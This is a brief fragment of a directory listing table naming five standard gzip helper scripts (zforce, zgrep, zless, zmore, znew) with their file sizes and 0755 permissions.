|
| zforce | File | 2.03 KB | 0755 |
|
| zgrep | File | 7.91 KB | 0755 |
|
| zless | File | 2.15 KB | 0755 |
|
| zmore | File | 1.8 KB | 0755 |
|
| znew | File | 4.47 KB | 0755 |
|